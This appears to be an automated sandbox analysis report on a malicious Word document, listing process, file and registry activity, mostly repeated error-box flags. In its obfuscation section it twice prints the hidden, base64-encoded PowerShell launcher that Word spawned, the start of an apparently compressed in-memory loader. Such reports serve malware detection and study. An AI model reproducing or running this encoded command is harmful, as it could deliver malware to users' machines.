    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE document summary: edited time not present or 0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: ~DF93C02D3A080000CF.TMP.0.drInitial sample: OLE indicators vbamacros = False

    Data Obfuscation:

    barindex
    Suspicious powershell command line foundShow sources
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAz
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_000007FF0025090D push edi; ret 2_2_000007FF00250996
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
